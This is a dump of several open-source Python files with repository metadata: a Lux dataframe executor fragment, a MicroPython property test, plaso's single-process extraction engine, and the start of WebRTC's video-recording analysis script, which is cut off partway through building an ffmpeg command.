vis._vis_data = vis.data.sort_values(by=groupby_attr.attribute, ascending=True)
vis._vis_data = vis.data.reset_index()
vis._vis_data = vis.data.drop(columns="index")
@staticmethod
def execute_binning(vis: Vis):
"""
Binning of data points for generating histograms
Parameters
----------
vis: lux.Vis
lux.Vis object that represents a visualization
ldf : lux.core.frame
LuxDataFrame with specified intent.
Returns
-------
None
"""
import numpy as np
bin_attribute = list(filter(lambda x: x.bin_size != 0, vis._inferred_intent))[0]
bin_attr = bin_attribute.attribute
if not np.isnan(vis.data[bin_attr]).all():
# np.histogram breaks if array contain NaN
series = vis.data[bin_attr].dropna()
# TODO:binning runs for name attribte. Name attribute has datatype quantitative which is wrong.
counts, bin_edges = np.histogram(series, bins=bin_attribute.bin_size)
# bin_edges of size N+1, so need to compute bin_center as the bin location
bin_center = np.mean(np.vstack([bin_edges[0:-1], bin_edges[1:]]), axis=0)
# TODO: Should vis.data be a LuxDataFrame or a Pandas DataFrame?
binned_result = np.array([bin_center, counts]).T
vis._vis_data = pd.DataFrame(binned_result, columns=[bin_attr, "Number of Records"])
@staticmethod
def execute_filter(vis: Vis):
assert (
vis.data is not None
), "execute_filter assumes input vis.data is populated (if not, populate with LuxDataFrame values)"
filters = utils.get_filter_specs(vis._inferred_intent)
if filters:
# TODO: Need to handle OR logic
for filter in filters:
vis._vis_data = PandasExecutor.apply_filter(
vis.data, filter.attribute, filter.filter_op, filter.value
)
return True
else:
return False
@staticmethod
def apply_filter(df: pd.DataFrame, attribute: str, op: str, val: object) -> pd.DataFrame:
"""
Helper function for applying filter to a dataframe
Parameters
----------
df : pandas.DataFrame
Dataframe to filter on
attribute : str
Filter attribute
op : str
Filter operation, '=', '<', '>', '<=', '>=', '!='
val : object
Filter value
Returns
-------
df: pandas.DataFrame
Dataframe resulting from the filter operation
"""
if op == "=":
return df[df[attribute] == val]
elif op == "<":
return df[df[attribute] < val]
elif op == ">":
return df[df[attribute] > val]
elif op == "<=":
return df[df[attribute] <= val]
elif op == ">=":
return df[df[attribute] >= val]
elif op == "!=":
return df[df[attribute] != val]
return df
@staticmethod
def execute_2D_binning(vis: Vis):
pd.reset_option("mode.chained_assignment")
with pd.option_context("mode.chained_assignment", None):
x_attr = vis.get_attr_by_channel("x")[0].attribute
y_attr = vis.get_attr_by_channel("y")[0].attribute
vis._vis_data["xBin"] = pd.cut(vis._vis_data[x_attr], bins=40)
vis._vis_data["yBin"] = pd.cut(vis._vis_data[y_attr], bins=40)
color_attr = vis.get_attr_by_channel("color")
if len(color_attr) > 0:
color_attr = color_attr[0]
groups = vis._vis_data.groupby(["xBin", "yBin"])[color_attr.attribute]
if color_attr.data_type == "nominal":
# Compute mode and count. Mode aggregates each cell by taking the majority vote for the category variable. In cases where there is ties across categories, pick the first item (.iat[0])
result = groups.agg(
[
("count", "count"),
(color_attr.attribute, lambda x: pd.Series.mode(x).iat[0]),
]
).reset_index()
elif color_attr.data_type == "quantitative":
# Compute the average of all values in the bin
result = groups.agg(
[("count", "count"), (color_attr.attribute, "mean")]
).reset_index()
result = result.dropna()
else:
groups = vis._vis_data.groupby(["xBin", "yBin"])[x_attr]
result = groups.count().reset_index(name=x_attr)
result = result.rename(columns={x_attr: "count"})
result = result[result["count"] != 0]
# convert type to facilitate weighted correlation interestingess calculation
result["xBinStart"] = result["xBin"].apply(lambda x: x.left).astype("float")
result["xBinEnd"] = result["xBin"].apply(lambda x: x.right)
result["yBinStart"] = result["yBin"].apply(lambda x: x.left).astype("float")
result["yBinEnd"] = result["yBin"].apply(lambda x: x.right)
vis._vis_data = result.drop(columns=["xBin", "yBin"])
#######################################################
############ Metadata: data type, model #############
#######################################################
def compute_dataset_metadata(self, ldf: LuxDataFrame):
ldf.data_type_lookup = {}
ldf.data_type = {}
self.compute_data_type(ldf)
ldf.data_model_lookup = {}
ldf.data_model = {}
self.compute_data_model(ldf)
def compute_data_type(self, ldf: LuxDataFrame):
from pandas.api.types import is_datetime64_any_dtype as is_datetime
for attr in list(ldf.columns):
temporal_var_list = ["month", "year", "day", "date", "time"]
if is_datetime(ldf[attr]):
ldf.data_type_lookup[attr] = "temporal"
elif self._is_datetime_string(ldf[attr]):
ldf.data_type_lookup[attr] = "temporal"
elif isinstance(attr, pd._libs.tslibs.timestamps.Timestamp):
ldf.data_type_lookup[attr] = "temporal"
elif str(attr).lower() in temporal_var_list:
ldf.data_type_lookup[attr] = "temporal"
elif pd.api.types.is_float_dtype(ldf.dtypes[attr]):
ldf.data_type_lookup[attr] = "quantitative"
elif pd.api.types.is_integer_dtype(ldf.dtypes[attr]):
# See if integer value is quantitative or nominal by checking if the ratio of cardinality/data size is less than 0.4 and if there are less than 10 unique values
if ldf.pre_aggregated:
if ldf.cardinality[attr] == len(ldf):
ldf.data_type_lookup[attr] = "nominal"
if ldf.cardinality[attr] / len(ldf) < 0.4 and ldf.cardinality[attr] < 20:
ldf.data_type_lookup[attr] = "nominal"
else:
ldf.data_type_lookup[attr] = "quantitative"
if check_if_id_like(ldf, attr):
ldf.data_type_lookup[attr] = "id"
# Eliminate this clause because a single NaN value can cause the dtype to be object
elif pd.api.types.is_string_dtype(ldf.dtypes[attr]):
if check_if_id_like(ldf, attr):
ldf.data_type_lookup[attr] = "id"
else:
ldf.data_type_lookup[attr] = "nominal"
# check if attribute is any type of datetime dtype
elif is_datetime_series(ldf.dtypes[attr]):
ldf.data_type_lookup[attr] = "temporal"
else:
ldf.data_type_lookup[attr] = "nominal"
# for attr in list(df.dtypes[df.dtypes=="int64"].keys()):
# if self.cardinality[attr]>50:
if ldf.index.dtype != "int64" and ldf.index.name:
ldf.data_type_lookup[ldf.index.name] = "nominal"
ldf.data_type = self.mapping(ldf.data_type_lookup)
non_datetime_attrs = []
for attr in ldf.columns:
if ldf.data_type_lookup[attr] == "temporal" and not is_datetime(ldf[attr]):
non_datetime_attrs.append(attr)
if len(non_datetime_attrs) == 1:
warnings.warn(
f"\nLux detects that the attribute '{non_datetime_attrs[0]}' may be temporal.\n"
"In order to display visualizations for this attribute accurately, temporal attributes should be converted to Pandas Datetime objects.\n\n"
"Please consider converting this attribute using the pd.to_datetime function and providing a 'format' parameter to specify datetime format of the attribute.\n"
"For example, you can convert the 'month' attribute in a dataset to Datetime type via the following command:\n\n\t df['month'] = pd.to_datetime(df['month'], format='%m')\n\n"
"See more at: https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.to_datetime.html\n",
stacklevel=2,
)
elif len(non_datetime_attrs) > 1:
warnings.warn(
f"\nLux detects that attributes {non_datetime_attrs} may be temporal.\n"
"In order to display visualizations for these attributes accurately, temporal attributes should be converted to Pandas Datetime objects.\n\n"
"Please consider converting these attributes using the pd.to_datetime function and providing a 'format' parameter to specify datetime format of the attribute.\n"
"For example, you can convert the 'month' attribute in a dataset to Datetime type via the following command:\n\n\t df['month'] = pd.to_datetime(df['month'], format='%m')\n\n"
"See more at: https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.to_datetime.html\n",
stacklevel=2,
)
def _is_datetime_string(self, series):
if len(series) > 100:
series = series.sample(100)
if series.dtype == object:
not_numeric = False
try:
pd.to_numeric(series)
except Exception as e:
not_numeric = True
datetime_col = None
if not_numeric:
try:
datetime_col = pd.to_datetime(series)
except Exception as e:
return False
if datetime_col is not None:
return True
return False
def compute_data_model(self, ldf: LuxDataFrame):
ldf.data_model = {
"measure": ldf.data_type["quantitative"],
"dimension": ldf.data_type["nominal"] + ldf.data_type["temporal"] + ldf.data_type["id"],
}
ldf.data_model_lookup = self.reverseMapping(ldf.data_model)
def compute_stats(self, ldf: LuxDataFrame):
# precompute statistics
ldf.unique_values = {}
ldf._min_max = {}
ldf.cardinality = {}
for attribute in ldf.columns:
if isinstance(attribute, pd._libs.tslibs.timestamps.Timestamp):
# If timestamp, make the dictionary keys the _repr_ (e.g., TimeStamp('2020-04-05 00.000')--> '2020-04-05')
attribute_repr = str(attribute._date_repr)
else:
attribute_repr = attribute
ldf.unique_values[attribute_repr] = list(ldf[attribute_repr].unique())
ldf.cardinality[attribute_repr] = len(ldf.unique_values[attribute_repr])
# commenting this optimization out to make sure I can filter by cardinality when showing recommended vis
# if ldf.dtypes[attribute] != "float64":# and not pd.api.types.is_datetime64_ns_dtype(self.dtypes[attribute]):
# ldf.unique_values[attribute_repr] = list(ldf[attribute].unique())
# ldf.cardinality[attribute_repr] = len(ldf.unique_values[attribute])
# else:
# ldf.cardinality[attribute_repr] = 999 # special value for non-numeric attribute
if ldf.dtypes[attribute] == "float64" or ldf.dtypes[attribute] == "int64":
ldf._min_max[attribute_repr] = (
ldf[attribute].min(),
ldf[attribute].max(),
)
if ldf.index.dtype != "int64":
index_column_name = ldf.index.name
ldf.unique_values[index_column_name] = list(ldf.index)
ldf.cardinality[index_column_name] = len(ldf.index)
| 46.134538
| 204
| 0.574712
|
4df9842a3e40a7b2a143d57529408f9815ebd34a
| 1,132
|
py
|
Python
|
tests/basics/builtin_property.py
|
0x0ece/micropython
|
4ee07f4883136dfbd1795dea3b04c478072d5630
|
[
"MIT"
] | 303
|
2015-07-11T17:12:55.000Z
|
2018-01-08T03:02:37.000Z
|
python/micropython/tests/basics/builtin_property.py
|
r-lyeh/script-it
|
cd7b259ccbd14d05c8d8fec1a33af9de5337e60c
|
[
"Unlicense"
] | 13
|
2016-05-12T16:51:22.000Z
|
2018-01-10T22:33:25.000Z
|
python/micropython/tests/basics/builtin_property.py
|
r-lyeh/script-it
|
cd7b259ccbd14d05c8d8fec1a33af9de5337e60c
|
[
"Unlicense"
] | 26
|
2018-01-18T09:15:33.000Z
|
2022-02-07T13:09:14.000Z
|
# test builtin property
# create a property object explicitly
property()
property(1, 2, 3)
# use its accessor methods
p = property()
p.getter(1)
p.setter(2)
p.deleter(3)
# basic use as a decorator
class A:
def __init__(self, x):
self._x = x
@property
def x(self):
print("x get")
return self._x
a = A(1)
print(a.x)
try:
a.x = 2
except AttributeError:
print("AttributeError")
# explicit use within a class
class B:
def __init__(self, x):
self._x = x
def xget(self):
print("x get")
return self._x
def xset(self, value):
print("x set")
self._x = value
def xdel(self):
print("x del")
x = property(xget, xset, xdel)
b = B(3)
print(b.x)
b.x = 4
print(b.x)
del b.x
# full use as a decorator
class C:
def __init__(self, x):
self._x = x
@property
def x(self):
print("x get")
return self._x
@x.setter
def x(self, value):
print("x set")
self._x = value
@x.deleter
def x(self):
print("x del")
c = C(5)
print(c.x)
c.x = 6
print(c.x)
del c.x
| 14.329114
| 37
| 0.553004
|
ff9d5bcb4bc6f302bcd5232a86402a0f72522120
| 14,239
|
py
|
Python
|
plaso/single_process/extraction_engine.py
|
jonathan-greig/plaso
|
b88a6e54c06a162295d09b016bddbfbfe7ca9070
|
[
"Apache-2.0"
] | 6
|
2015-07-30T11:07:24.000Z
|
2021-07-23T07:12:30.000Z
|
plaso/single_process/extraction_engine.py
|
jonathan-greig/plaso
|
b88a6e54c06a162295d09b016bddbfbfe7ca9070
|
[
"Apache-2.0"
] | null | null | null |
plaso/single_process/extraction_engine.py
|
jonathan-greig/plaso
|
b88a6e54c06a162295d09b016bddbfbfe7ca9070
|
[
"Apache-2.0"
] | 1
|
2021-07-23T07:12:37.000Z
|
2021-07-23T07:12:37.000Z
|
# -*- coding: utf-8 -*-
"""The single process extraction engine."""
import collections
import os
import pdb
import threading
import time
from dfvfs.lib import definitions as dfvfs_definitions
from dfvfs.lib import errors as dfvfs_errors
from dfvfs.resolver import resolver
from plaso.containers import counts
from plaso.containers import event_sources
from plaso.engine import engine
from plaso.engine import extractors
from plaso.engine import logger
from plaso.engine import process_info
from plaso.engine import worker
from plaso.lib import definitions
from plaso.parsers import mediator as parsers_mediator
class SingleProcessEngine(engine.BaseEngine):
"""Single process extraction engine."""
# Maximum number of dfVFS file system objects to cache.
_FILE_SYSTEM_CACHE_SIZE = 3
def __init__(self):
"""Initializes a single process extraction engine."""
super(SingleProcessEngine, self).__init__()
self._current_display_name = ''
self._extraction_worker = None
self._file_system_cache = []
self._number_of_consumed_sources = 0
self._parser_mediator = None
self._parsers_counter = None
self._path_spec_extractor = extractors.PathSpecExtractor()
self._pid = os.getpid()
self._process_information = process_info.ProcessInfo(self._pid)
self._processing_configuration = None
self._resolver_context = None
self._status = definitions.STATUS_INDICATOR_IDLE
self._status_update_active = False
self._status_update_callback = None
self._status_update_thread = None
self._storage_writer = None
def _CacheFileSystem(self, path_spec):
"""Caches a dfVFS file system object.
Keeping and additional reference to a dfVFS file system object causes the
object to remain cached in the resolver context. This minimizes the number
times the file system is re-opened.
Args:
path_spec (dfvfs.PathSpec): path specification.
"""
if (path_spec and not path_spec.IsSystemLevel() and
path_spec.type_indicator != dfvfs_definitions.TYPE_INDICATOR_GZIP):
file_system = resolver.Resolver.OpenFileEntry(
path_spec, resolver_context=self._resolver_context)
if file_system not in self._file_system_cache:
if len(self._file_system_cache) == self._FILE_SYSTEM_CACHE_SIZE:
self._file_system_cache.pop(0)
self._file_system_cache.append(file_system)
elif len(self._file_system_cache) == self._FILE_SYSTEM_CACHE_SIZE:
# Move the file system to the end of the list to preserve the most
# recently file system object.
self._file_system_cache.remove(file_system)
self._file_system_cache.append(file_system)
def _ProcessPathSpec(self, extraction_worker, parser_mediator, path_spec):
"""Processes a path specification.
Args:
extraction_worker (worker.ExtractionWorker): extraction worker.
parser_mediator (ParserMediator): parser mediator.
path_spec (dfvfs.PathSpec): path specification.
"""
self._current_display_name = parser_mediator.GetDisplayNameForPathSpec(
path_spec)
self._CacheFileSystem(path_spec)
excluded_find_specs = None
if self.collection_filters_helper:
excluded_find_specs = (
self.collection_filters_helper.excluded_file_system_find_specs)
try:
extraction_worker.ProcessPathSpec(
parser_mediator, path_spec, excluded_find_specs=excluded_find_specs)
except KeyboardInterrupt:
self._abort = True
self._processing_status.aborted = True
if self._status_update_callback:
self._status_update_callback(self._processing_status)
# We cannot recover from a CacheFullError and abort processing when
# it is raised.
except dfvfs_errors.CacheFullError:
# TODO: signal engine of failure.
self._abort = True
logger.error((
'ABORT: detected cache full error while processing '
'path spec: {0:s}').format(self._current_display_name))
# All exceptions need to be caught here to prevent the worker
# from being killed by an uncaught exception.
except Exception as exception: # pylint: disable=broad-except
parser_mediator.ProduceExtractionWarning((
'unable to process path specification with error: '
'{0!s}').format(exception), path_spec=path_spec)
if getattr(self._processing_configuration, 'debug_output', False):
self._StopStatusUpdateThread()
logger.warning(
'Unhandled exception while processing path spec: {0:s}.'.format(
self._current_display_name))
logger.exception(exception)
pdb.post_mortem()
self._StartStatusUpdateThread()
def _ProcessSources(self, source_configurations, parser_mediator):
"""Processes the sources.
Args:
source_configurations (list[SourceConfigurationArtifact]): configurations
of the sources to process.
parser_mediator (ParserMediator): parser mediator.
"""
if self._processing_profiler:
self._processing_profiler.StartTiming('process_sources')
self._status = definitions.STATUS_INDICATOR_COLLECTING
self._current_display_name = ''
self._number_of_consumed_sources = 0
find_specs = None
if self.collection_filters_helper:
find_specs = (
self.collection_filters_helper.included_file_system_find_specs)
source_path_specs = [
configuration.path_spec for configuration in source_configurations]
path_spec_generator = self._path_spec_extractor.ExtractPathSpecs(
source_path_specs, find_specs=find_specs, recurse_file_system=False,
resolver_context=self._resolver_context)
for path_spec in path_spec_generator:
if self._abort:
break
self._status = definitions.STATUS_INDICATOR_COLLECTING
self._current_display_name = parser_mediator.GetDisplayNameForPathSpec(
path_spec)
# TODO: determine if event sources should be DataStream or FileEntry
# or both.
event_source = event_sources.FileEntryEventSource(path_spec=path_spec)
parser_mediator.ProduceEventSource(event_source)
self._status = definitions.STATUS_INDICATOR_RUNNING
if self._processing_profiler:
self._processing_profiler.StartTiming('get_event_source')
event_source = self._storage_writer.GetFirstWrittenEventSource()
if self._processing_profiler:
self._processing_profiler.StopTiming('get_event_source')
while event_source:
if self._abort:
break
self._ProcessPathSpec(
self._extraction_worker, parser_mediator, event_source.path_spec)
self._number_of_consumed_sources += 1
if self._processing_profiler:
self._processing_profiler.StartTiming('get_event_source')
event_source = self._storage_writer.GetNextWrittenEventSource()
if self._processing_profiler:
self._processing_profiler.StopTiming('get_event_source')
if self._abort:
self._status = definitions.STATUS_INDICATOR_ABORTED
else:
self._status = definitions.STATUS_INDICATOR_COMPLETED
if self._processing_profiler:
self._processing_profiler.StopTiming('process_sources')
def _StartStatusUpdateThread(self):
"""Starts the status update thread."""
self._status_update_active = True
self._status_update_thread = threading.Thread(
name='Status update', target=self._StatusUpdateThreadMain)
self._status_update_thread.start()
def _StatusUpdateThreadMain(self):
"""Main function of the status update thread."""
while self._status_update_active:
self._UpdateStatus()
time.sleep(self._STATUS_UPDATE_INTERVAL)
def _StopStatusUpdateThread(self):
"""Stops the status update thread."""
if self._status_update_thread:
self._status_update_active = False
if self._status_update_thread.is_alive():
self._status_update_thread.join()
self._status_update_thread = None
def _UpdateStatus(self):
"""Updates the processing status."""
status = self._extraction_worker.processing_status
if status == definitions.STATUS_INDICATOR_IDLE:
status = self._status
if status == definitions.STATUS_INDICATOR_IDLE:
status = definitions.STATUS_INDICATOR_RUNNING
used_memory = self._process_information.GetUsedMemory() or 0
self._processing_status.UpdateForemanStatus(
self._name, status, self._pid, used_memory, self._current_display_name,
self._number_of_consumed_sources,
self._parser_mediator.number_of_produced_event_sources,
0, self._parser_mediator.number_of_produced_events,
0, 0,
0, 0)
if self._status_update_callback:
self._status_update_callback(self._processing_status)
def _CreateParserMediator(
self, knowledge_base, resolver_context, processing_configuration):
"""Creates a parser mediator.
Args:
knowledge_base (KnowledgeBase): knowledge base which contains
information from the source data needed for parsing.
resolver_context (dfvfs.Context): resolver context.
processing_configuration (ProcessingConfiguration): processing
configuration.
Returns:
ParserMediator: parser mediator.
"""
parser_mediator = parsers_mediator.ParserMediator(
knowledge_base,
collection_filters_helper=self.collection_filters_helper,
resolver_context=resolver_context)
parser_mediator.SetExtractWinEvtResources(
processing_configuration.extraction.extract_winevt_resources)
parser_mediator.SetPreferredLanguage(
processing_configuration.preferred_language)
parser_mediator.SetPreferredTimeZone(
processing_configuration.preferred_time_zone)
parser_mediator.SetPreferredYear(
processing_configuration.preferred_year)
parser_mediator.SetTemporaryDirectory(
processing_configuration.temporary_directory)
parser_mediator.SetTextPrepend(
processing_configuration.text_prepend)
return parser_mediator
def ProcessSources(
self, source_configurations, storage_writer, resolver_context,
processing_configuration, force_parser=False,
status_update_callback=None):
"""Processes the sources.
Args:
source_configurations (list[SourceConfigurationArtifact]): configurations
of the sources to process.
storage_writer (StorageWriter): storage writer for a session storage.
resolver_context (dfvfs.Context): resolver context.
processing_configuration (ProcessingConfiguration): processing
configuration.
force_parser (Optional[bool]): True if a specified parser should be forced
to be used to extract events.
status_update_callback (Optional[function]): callback function for status
updates.
Returns:
ProcessingStatus: processing status.
"""
parser_mediator = self._CreateParserMediator(
self.knowledge_base, resolver_context, processing_configuration)
parser_mediator.SetStorageWriter(storage_writer)
self._extraction_worker = worker.EventExtractionWorker(
force_parser=force_parser, parser_filter_expression=(
processing_configuration.parser_filter_expression))
self._extraction_worker.SetExtractionConfiguration(
processing_configuration.extraction)
self._parser_mediator = parser_mediator
self._processing_configuration = processing_configuration
self._resolver_context = resolver_context
self._status_update_callback = status_update_callback
self._storage_writer = storage_writer
logger.debug('Processing started.')
parser_mediator.StartProfiling(
self._processing_configuration.profiling, self._name,
self._process_information)
self._StartProfiling(self._processing_configuration.profiling)
if self._analyzers_profiler:
self._extraction_worker.SetAnalyzersProfiler(self._analyzers_profiler)
if self._processing_profiler:
self._extraction_worker.SetProcessingProfiler(self._processing_profiler)
if self._serializers_profiler:
self._storage_writer.SetSerializersProfiler(self._serializers_profiler)
if self._storage_profiler:
self._storage_writer.SetStorageProfiler(self._storage_profiler)
self._StartStatusUpdateThread()
self._parsers_counter = collections.Counter({
parser_count.name: parser_count
for parser_count in self._storage_writer.GetAttributeContainers(
'parser_count')})
try:
self._ProcessSources(source_configurations, parser_mediator)
finally:
# Stop the status update thread after close of the storage writer
# so we include the storage sync to disk in the status updates.
self._StopStatusUpdateThread()
if self._analyzers_profiler:
self._extraction_worker.SetAnalyzersProfiler(None)
if self._processing_profiler:
self._extraction_worker.SetProcessingProfiler(None)
if self._serializers_profiler:
self._storage_writer.SetSerializersProfiler(None)
if self._storage_profiler:
self._storage_writer.SetStorageProfiler(None)
self._StopProfiling()
parser_mediator.StopProfiling()
for key, value in parser_mediator.parsers_counter.items():
parser_count = self._parsers_counter.get(key, None)
if parser_count:
parser_count.number_of_events += value
self._storage_writer.UpdateAttributeContainer(parser_count)
else:
parser_count = counts.ParserCount(name=key, number_of_events=value)
self._parsers_counter[key] = parser_count
self._storage_writer.AddAttributeContainer(parser_count)
if self._abort:
logger.debug('Processing aborted.')
self._processing_status.aborted = True
else:
logger.debug('Processing completed.')
# Update the status view one last time.
self._UpdateStatus()
self._extraction_worker = None
self._file_system_cache = []
self._parser_mediator = None
self._processing_configuration = None
self._resolver_context = None
self._status_update_callback = None
self._storage_writer = None
return self._processing_status
| 35.508728
| 80
| 0.744645
|
1a7bb48a47086915542c0dbce264404071b339b5
| 19,539
|
py
|
Python
|
rtc_tools/video_analysis.py
|
bebo/webrtc
|
61ab9c5200ffb1281d038978465543cc52598e16
|
[
"DOC",
"BSD-3-Clause"
] | null | null | null |
rtc_tools/video_analysis.py
|
bebo/webrtc
|
61ab9c5200ffb1281d038978465543cc52598e16
|
[
"DOC",
"BSD-3-Clause"
] | null | null | null |
rtc_tools/video_analysis.py
|
bebo/webrtc
|
61ab9c5200ffb1281d038978465543cc52598e16
|
[
"DOC",
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# Copyright (c) 2017 The WebRTC project authors. All Rights Reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
import glob
import optparse
import os
import shutil
import subprocess
import sys
import time
# Used to time-stamp output files and directories
CURRENT_TIME = time.strftime("%d_%m_%Y-%H:%M:%S")
class Error(Exception):
pass
class FfmpegError(Error):
pass
class MagewellError(Error):
pass
class CompareVideosError(Error):
pass
def _ParseArgs():
"""Registers the command-line options."""
usage = 'usage: %prog [options]'
parser = optparse.OptionParser(usage=usage)
parser.add_option('--frame_width', type='int', default=1280,
help='Width of the recording. Default: %default')
parser.add_option('--frame_height', type='int', default=720,
help='Height of the recording. Default: %default')
parser.add_option('--framerate', type='int', default=60,
help='Recording framerate. Default: %default')
parser.add_option('--ref_duration', type='int', default=20,
help='Reference recording duration. Default: %default')
parser.add_option('--test_duration', type='int', default=10,
help='Test recording duration. Default: %default')
parser.add_option('--time_between_recordings', type='int', default=5,
help='Time between starting test recording after ref.'
'Default: %default')
parser.add_option('--ref_video_device', type='string', default='/dev/video0',
help='Reference recording device. Default: %default')
parser.add_option('--test_video_device', type='string', default='/dev/video1',
help='Test recording device. Default: %default')
parser.add_option('--app_name', type='string',
help='Name of the app under test.')
parser.add_option('--recording_api', type='string', default='Video4Linux2',
help='Recording API to use. Default: %default')
parser.add_option('--pixel_format', type='string', default='yuv420p',
help='Recording pixel format Default: %default')
parser.add_option('--ffmpeg', type='string',
help='Path to the ffmpeg executable for the reference '
'device.')
parser.add_option('--video_container', type='string', default='yuv',
help='Video container for the recordings.'
'Default: %default')
parser.add_option('--compare_videos_script', type='string',
default='compare_videos.py',
help='Path to script used to compare and generate metrics.'
'Default: %default')
parser.add_option('--frame_analyzer', type='string',
default='../../out/Default/frame_analyzer',
help='Path to the frame analyzer executable.'
'Default: %default')
parser.add_option('--zxing_path', type='string',
help='Path to the zebra xing barcode analyzer.')
parser.add_option('--ref_rec_dir', type='string', default='ref',
help='Path to where reference recordings will be created.'
'Ideally keep the ref and test directories on separate'
'drives. Default: %default')
parser.add_option('--test_rec_dir', type='string', default='test',
help='Path to where test recordings will be created.'
'Ideally keep the ref and test directories on separate '
'drives. Default: %default')
parser.add_option('--test_crop_parameters', type='string',
help='ffmpeg processing parameters for the test video.')
parser.add_option('--ref_crop_parameters', type='string',
help='ffmpeg processing parameters for the ref video.')
options, _ = parser.parse_args()
if not options.app_name:
parser.error('You must provide an application name!')
if not options.test_crop_parameters or not options.ref_crop_parameters:
parser.error('You must provide ref and test crop parameters!')
# Ensure the crop filter is included in the crop parameters used for ffmpeg.
if 'crop' not in options.ref_crop_parameters:
parser.error('You must provide a reference crop filter for ffmpeg.')
if 'crop' not in options.test_crop_parameters:
parser.error('You must provide a test crop filter for ffmpeg.')
if not options.ffmpeg:
parser.error('You most provide location for the ffmpeg executable.')
if not os.path.isfile(options.ffmpeg):
parser.error('Cannot find the ffmpeg executable.')
# compare_videos.py dependencies.
if not os.path.isfile(options.compare_videos_script):
parser.warning('Cannot find compare_videos.py script, no metrics will be '
'generated!')
if not os.path.isfile(options.frame_analyzer):
parser.warning('Cannot find frame_analyzer, no metrics will be generated!')
if not os.path.isfile(options.zxing_path):
parser.warning('Cannot find Zebra Xing, no metrics will be generated!')
return options
def CreateRecordingDirs(options):
"""Create root + sub directories for reference and test recordings.
Args:
options(object): Contains all the provided command line options.
Returns:
record_paths(dict): key: value pair with reference and test file
absolute paths.
"""
# Create root directories for the video recordings.
if not os.path.isdir(options.ref_rec_dir):
os.makedirs(options.ref_rec_dir)
if not os.path.isdir(options.test_rec_dir):
os.makedirs(options.test_rec_dir)
# Create and time-stamp directories for all the output files.
ref_rec_dir = os.path.join(options.ref_rec_dir, options.app_name + '_' + \
CURRENT_TIME)
test_rec_dir = os.path.join(options.test_rec_dir, options.app_name + '_' + \
CURRENT_TIME)
os.makedirs(ref_rec_dir)
os.makedirs(test_rec_dir)
record_paths = {
'ref_rec_location' : os.path.abspath(ref_rec_dir),
'test_rec_location' : os.path.abspath(test_rec_dir)
}
return record_paths
def FindUsbPortForV4lDevices(ref_video_device, test_video_device):
"""Tries to find the usb port for ref_video_device and test_video_device.
Tries to find the provided ref_video_device and test_video_device devices
which use video4linux and then do a soft reset by using USB unbind and bind.
Args:
ref_device(string): reference recording device path.
test_device(string): test recording device path
Returns:
usb_ports(list): USB ports(string) for the devices found.
"""
# Find the device location including USB and USB Bus ID's. Use the usb1
# in the path since the driver folder is a symlink which contains all the
# usb device port mappings and it's the same in all usbN folders. Tested
# on Ubuntu 14.04.
v4l_device_path = '/sys/bus/usb/devices/usb1/1-1/driver/**/**/video4linux/'
v4l_ref_device = glob.glob('%s%s' % (v4l_device_path, ref_video_device))
v4l_test_device = glob.glob('%s%s' % (v4l_device_path, test_video_device))
usb_ports = []
paths = []
# Split on the driver folder first since we are only interested in the
# folders thereafter.
try:
ref_path = str(v4l_ref_device).split('driver')[1].split('/')
test_path = str(v4l_test_device).split('driver')[1].split('/')
except IndexError:
print 'Could not find one or both of the specified recording devices.'
else:
paths.append(ref_path)
paths.append(test_path)
for path in paths:
for usb_id in path:
# Look for : separator and then use the first element in the list.
# E.g 3-3.1:1.0 split on : and [0] becomes 3-3.1 which can be used
# for bind/unbind.
if ':' in usb_id:
usb_ports.append(usb_id.split(':')[0])
return usb_ports
def RestartMagewellDevices(ref_video_device_path, test_video_device_path):
"""Reset the USB ports where Magewell capture devices are connected to.
Performs a soft reset by using USB unbind and bind.
This is due to Magewell capture devices have proven to be unstable after the
first recording attempt.
Args:
ref_video_device_path(string): reference recording device path.
test_video_device_path(string): test recording device path
Raises:
MagewellError: If no magewell devices are found.
"""
# Get the dev/videoN device name from the command line arguments.
ref_magewell_path = ref_video_device_path.split('/')[2]
test_magewell_path = test_video_device_path.split('/')[2]
magewell_usb_ports = FindUsbPortForV4lDevices(ref_magewell_path,
test_magewell_path)
# Abort early if no devices are found.
if len(magewell_usb_ports) == 0:
raise MagewellError('No magewell devices found.')
else:
print '\nResetting USB ports where magewell devices are connected...'
# Use the USB bus and port ID (e.g. 4-3) to unbind and bind the USB devices
# (i.e. soft eject and insert).
for usb_port in magewell_usb_ports:
echo_cmd = ['echo', usb_port]
unbind_cmd = ['sudo', 'tee', '/sys/bus/usb/drivers/usb/unbind']
bind_cmd = ['sudo', 'tee', '/sys/bus/usb/drivers/usb/bind']
# TODO(jansson) Figure out a way to call on echo once for bind & unbind
# if possible.
echo_unbind = subprocess.Popen(echo_cmd, stdout=subprocess.PIPE)
unbind = subprocess.Popen(unbind_cmd, stdin=echo_unbind.stdout)
echo_unbind.stdout.close()
unbind.wait()
echo_bind = subprocess.Popen(echo_cmd, stdout=subprocess.PIPE)
bind = subprocess.Popen(bind_cmd, stdin=echo_bind.stdout)
echo_bind.stdout.close()
bind.wait()
if bind.returncode == 0:
print 'Reset done!\n'
def StartRecording(options, ref_file_location, test_file_location):
"""Starts recording from the two specified video devices.
Args:
options(object): Contains all the provided command line options.
record_paths(dict): key: value pair with reference and test file
absolute paths.
Returns:
recording_files_and_time(dict): key: value pair with the path to cropped
test and reference video files.
Raises:
FfmpegError: If the ffmpeg command fails.
"""
ref_file_name = '%s_%s_ref.%s' % (options.app_name, CURRENT_TIME,
options.video_container)
ref_file = os.path.join(ref_file_location, ref_file_name)
test_file_name = '%s_%s_test.%s' % (options.app_name, CURRENT_TIME,
options.video_container)
test_file = os.path.join(test_file_location, test_file_name)
# Reference video recorder command line.
ref_cmd = [
options.ffmpeg,
'-v', 'error',
'-s', '%dx%d' % (options.frame_width, options.frame_height),
'-r', '%d' % options.framerate,
'-f', '%s' % options.recording_api,
'-i', '%s' % options.ref_video_device,
'-pix_fmt', '%s' % options.pixel_format,
'-s', '%dx%d' % (options.frame_width, options.frame_height),
'-t', '%d' % options.ref_duration,
'-r', '%d' % options.framerate,
ref_file
]
# Test video recorder command line.
test_cmd = [
options.ffmpeg,
'-v', 'error',
'-s', '%dx%d' % (options.frame_width, options.frame_height),
